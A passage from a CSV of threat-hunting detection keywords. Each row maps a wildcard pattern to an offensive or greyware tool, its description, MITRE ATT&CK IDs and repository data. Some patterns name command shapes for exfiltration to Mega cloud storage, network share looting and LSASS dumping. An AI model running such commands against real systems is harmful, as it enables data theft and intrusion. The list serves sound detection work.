auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*manager/keepass.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*manager/mRemoteNG.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*mandiant/DueDLLigence*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" +"*mandiant/gocrack*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*mandiant/msi-search*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" +"*mandllinject *","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","0","N/A","10","10","140","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" +"*manspider * -d * -u * -p *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*manspider */24 -f *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*manspider --threads * -d * -u * -H * --content admin*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*manspider*--loot-dir*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*manspider*--sharenames*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*manspider.py*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*manspider.spiderling*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*manspider_scan*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*MANSPIDER-master*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*map_payload_dll*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*map-get-tls-alternative-names *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*mapper_cve_exploit.py*","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Chudry/Xerror","1","1","N/A","N/A","5","458","106","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z" +"*masky_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*masscan -c *","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"*masscan --nmap*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"*masscan -p*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"*masscan* -p*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"*massdns -r *.txt*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*master/bootkit/src*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" +"*master/EncryptedZIP*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*master/HookDetector*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*master/ImplantSSP/*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*master/SwampThing*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*master/UnquotedPath*","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*MATCH (c:Computer {unconsraineddelegation:true}) RETURN c*","greyware_tool_keyword","Neo4j","Neo4j queries - Computers in Unconstrained Delegations","T1210.002 - T1078.003 - T1046","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*MATCH (c:Computer)*(t:Computer)* *-[:AllowedToDelegate]* return p*","greyware_tool_keyword","Neo4j","Neo4j queries - Computers AllowedToDelegate to other computers","T1210.002 - T1078.003 - T1046","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*MATCH p=(u:User)-[:SQLAdmin]*(c:Computer) return p*","greyware_tool_keyword","Neo4j","Neo4j queries - Potential SQL Admins","T1210.002 - T1078.003 - T1046","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*matterpreter*","offensive_tool_keyword","Github Username","github username hosting offensive tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/matterpreter","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*matterpreter/DefenderCheck*","offensive_tool_keyword","DefenderCheck","Identifies the bytes that Microsoft Defender flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"*matterpreter/Shhmon*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" +"*MattKeeley/Spoofy*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*MayankPandey01/Jira-Lens*","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","3","206","31","2022-08-23T09:57:52Z","2021-11-14T18:37:47Z" +"*mbrg/power-pwn*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*mcafee_epo2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*McpManagementPotato.*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" +"*md *.::$index_allocation*","greyware_tool_keyword","$index_allocation","creation of hidden folders (and file) via ...$.......::$index_allocation","T1027.001 - T1564.001","TA0005 ","N/A","N/A","Defense Evasion","https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*Md4-128.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Md5-128.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*mDNSSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*MDSDLL_x64.dll*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*MDSDLL_x86.dll*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*mdsecactivebreach*","offensive_tool_keyword","Github Username","MDSecs ActiveBreach Team. own a github repo with lots of exploitation tools https://www.mdsec.co.uk/services/red-teaming/","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/mdsecactivebreach/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*mdsecactivebreach/CACTUSTORCH*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" +"*mdsecactivebreach/Farmer*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","1","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" +"*med0x2e/GadgetToJScript*","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","8","777","157","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" +"*med0x2e/SigFlip*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*med0x2e/SigFlip*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*media_variable_file_cryptography.py*","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","3","220","27","2023-05-18T19:55:17Z","2022-08-12T22:16:46Z" +"*megacmd -conf * put *mega:*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*megadose/holehe*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"*megadose@protonmail.com*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"*megatools copy -l * -r *","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/megous/megatools","1","0","N/A","9",,"N/A",,, +"*megatools put *","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://github.com/megous/megatools","1","0","N/A","9",,"N/A",,, +"*meliht/Mr.SIP*","offensive_tool_keyword","Mr.SIP","Mr.SIP is a simple console based SIP-based Audit and Attack Tool. Originally it was developed to be used in academic work to help developing novel SIP-based DDoS attacks and then as an idea to convert it to a fully functional SIP-based penetration testing tool. So far Mr SIP resulted several academic research papers. and journal articles. Mr.SIP can also be used as SIP client simulator and SIP traffic generator.","T1522 - T1521 - T1523 - T1505 - T1506","TA0010 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/meliht/Mr.SIP","1","1","N/A","N/A","4","366","100","2023-05-21T08:11:20Z","2017-09-07T18:23:00Z" +"*Memcrashed-DDoS-Exploit*","offensive_tool_keyword","Memcrashed-DDoS-Exploit","This tool allows you to send forged UDP packets to Memcached servers obtained from Shodan.io","T1436 - T1498 - T1216 - T1190","TA0043 - TA0044 - TA0001","N/A","N/A","Exploitation tools","https://github.com/649/Memcrashed-DDoS-Exploit","1","1","N/A","N/A","10","1279","493","2022-12-02T07:14:59Z","2018-03-02T21:19:51Z" +"*memfd implant *.elf*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*memfd task 